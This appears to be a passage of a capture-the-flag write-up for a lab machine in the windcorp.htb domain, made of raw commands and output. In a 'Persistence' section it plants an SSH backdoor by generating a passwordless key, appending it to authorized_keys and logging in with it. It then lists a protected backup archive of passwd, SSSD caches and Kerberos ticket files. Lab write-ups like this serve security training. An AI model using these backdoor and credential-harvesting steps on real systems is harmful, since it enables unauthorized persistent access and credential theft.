Enumeration
Persistence
ssh-keygen -t rsa -b 4096 -f backdoor_key -N ""
webster@webserver:~/.ssh$ echo 'ssh-rsa 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 anonmak9@anonmak9' >> ~/.ssh/authorized_keys
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys
ssh -i backdoor_key [email protected]
Moving On
unzip backup.zip
Archive: backup.zip
[backup.zip] etc/passwd password:
unzip -l backup.zip
Archive: backup.zip
Length Date Time Name
--------- ---------- ----- ----
1509 2022-04-30 10:27 etc/passwd
0 2021-02-10 05:49 etc/sssd/conf.d/
411 2022-04-29 07:39 etc/sssd/sssd.conf
0 2022-07-28 06:31 var/lib/sss/db/
1286144 2022-07-28 06:24 var/lib/sss/db/timestamps_windcorp.htb.ldb
1286144 2022-07-28 06:16 var/lib/sss/db/config.ldb
0 2022-07-28 06:16 var/lib/sss/db/test/
1286144 2022-07-28 06:01 var/lib/sss/db/test/timestamps_windcorp.htb.ldb
1286144 2022-07-28 06:04 var/lib/sss/db/test/config.ldb
1286144 2022-07-28 06:12 var/lib/sss/db/test/cache_windcorp.htb.ldb
1286144 2022-04-30 11:51 var/lib/sss/db/test/sssd.ldb
4016 2022-07-28 06:04 var/lib/sss/db/test/ccache_WINDCORP.HTB
1609728 2022-07-28 06:38 var/lib/sss/db/cache_windcorp.htb.ldb
1286144 2022-07-28 06:16 var/lib/sss/db/sssd.ldb
2708 2022-07-28 06:31 var/lib/sss/db/ccache_WINDCORP.HTB
0 2021-02-10 05:49 var/lib/sss/deskprofile/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/Policies/
0 2022-07-28 06:24 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/
0 2022-07-28 06:23 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/
2568 2022-07-28 06:23 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
23 2022-07-28 06:24 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
0 2021-02-10 05:49 var/lib/sss/keytabs/
0 2022-07-28 06:16 var/lib/sss/mc/
9253600 2022-07-28 06:24 var/lib/sss/mc/passwd
6940392 2022-07-28 06:16 var/lib/sss/mc/group
11567160 2022-07-28 06:23 var/lib/sss/mc/initgroups
0 2022-07-28 06:16 var/lib/sss/pipes/
0 2022-07-28 06:16 var/lib/sss/pipes/private/
0 2022-07-28 06:31 var/lib/sss/pubconf/
12 2022-07-28 06:31 var/lib/sss/pubconf/kdcinfo.WINDCORP.HTB
0 2022-07-28 06:16 var/lib/sss/pubconf/krb5.include.d/
40 2022-07-28 06:16 var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
113 2022-07-28 06:16 var/lib/sss/pubconf/krb5.include.d/localauth_plugin
15 2022-07-28 06:16 var/lib/sss/pubconf/krb5.include.d/domain_realm_windcorp_htb
0 2021-02-10 05:49 var/lib/sss/secrets/
--------- -------
38385303 40 files